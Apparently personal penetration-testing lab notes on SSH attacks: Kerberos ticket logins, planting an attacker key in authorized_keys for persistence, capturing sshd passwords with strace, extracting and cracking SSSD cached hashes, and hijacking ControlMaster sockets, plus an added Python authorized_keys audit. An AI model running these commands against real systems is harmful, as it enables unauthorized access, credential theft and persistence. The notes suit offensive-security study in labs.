SSH Login with ccache
ssh -K leivy@klendathu.vl@srv2.klendathu.vl
kinit Rosie.powell
kvno host/frajmp.HERON.VL
ssh -K svc-web-accounting@HERON.VL@frajmp.HERON.VL
SSH persistence
On client machine
ssh-keygen
On victim machine
echo "ssh-rsa AAAAB3NzaC1yc2E....ANSzp9EPhk4cIeX8= kali@kali" >> /home/linuxvictim/.ssh/authorized_keys
On client machine
ssh linuxvictim@linuxvictim
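A defender-side check for the key appended above, as an added example that is not part of the original notes: it fingerprints each authorized_keys entry in the format `ssh-keygen -lf` prints and reports any key missing from an approved set. The `fake_blob` helper, the key blobs, the `backup@ops` entry and the approved set are constructed for illustration.

```python
import base64, hashlib, re, struct

KEY_RE = re.compile(
    r"(?:^|\s)((?:ssh|ecdsa|sk)-[\w@.-]+)\s+([A-Za-z0-9+/]+={0,2})(?:\s+(.*))?$")

def fingerprint(blob):
    """SHA256 fingerprint in the format printed by `ssh-keygen -lf`."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_line(line):
    """Return (keytype, fingerprint, comment), or None if no valid key is found."""
    m = KEY_RE.search(line)  # search, not match: options may precede the key type
    if not m:
        return None
    keytype, b64, comment = m.group(1), m.group(2), m.group(3) or ""
    try:
        blob = base64.b64decode(b64, validate=True)
        (n,) = struct.unpack(">I", blob[:4])
    except (ValueError, struct.error):
        return None
    # The decoded blob begins with a length-prefixed copy of the key type.
    if blob[4:4 + n] != keytype.encode():
        return None
    return keytype, fingerprint(blob), comment

def audit(text, approved):
    """Return (lineno, status, detail) for every key line not in `approved`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parsed = parse_line(line)
        if parsed is None:
            findings.append((lineno, "unparseable", line[:40]))
        elif parsed[1] not in approved:
            findings.append((lineno, "unapproved", f"{parsed[1]} {parsed[2]}"))
    return findings

def fake_blob(keytype, filler):
    """Constructed stand-in for a public key blob (not a usable key)."""
    return struct.pack(">I", len(keytype)) + keytype.encode() + filler

OPS = fake_blob("ssh-ed25519", b"\x01" * 36)   # constructed, treated as approved
ADDED = fake_blob("ssh-rsa", b"\x02" * 64)     # constructed, the appended key
SAMPLE = (f"no-pty ssh-ed25519 {base64.b64encode(OPS).decode()} backup@ops\n"
          f"ssh-rsa {base64.b64encode(ADDED).decode()} kali@kali\n")
print(audit(SAMPLE, approved={fingerprint(OPS)}))
```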
Sniffing SSH password as root
pgrep -l sshd
strace -f -p 633 -e trace=write -o capture633
cat capture633
SSH cached credentials as root
We can get the stored passwords from the SSSD cache at /var/lib/sss/db/cache_vigilant.vl:
strings cache_vigilant.vl.ldb | grep -B 14 -A 2 cachedPassword | tee hashes.txt
grep '\$' hashes.txt | sort -u | uniq
.\hashcat.exe -m 1800 -o ..\cracked.txt ..\hashes.txt ..\rockyou.txt
SSH Hijacking
ls -al ~/.ssh/controlmaster/
ssh offsec@linuxvictim
In the second scenario, we’re logged in as a root user (or someone with sudo privileges). In this case, we return to our Kali VM and this time, we’ll log in to the controller VM as root instead of offsec.
From here, we can hijack the open SSH socket using the SSH client’s -S parameter, which specifies a socket.
root@controller:~# ls -al /home/offsec/.ssh/controlmaster
total 8
drwxrwxr-x 2 offsec offsec 4096 May 13 16:22 .
drwx------ 3 offsec offsec 4096 May 13 13:55 ..
srw------- 1 offsec offsec    0 May 13 16:22 offsec@linuxvictim:22
root@controller:~# ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim
Last login: Wed May 13 16:22:08 2020 from 192.168.120.40
offsec@linuxvictim:~$
ssh -S /root/.ssh/controlmaster/florence.ramirez@ghost.htb@dev-workstation:22 florence.ramirez@dev-workstation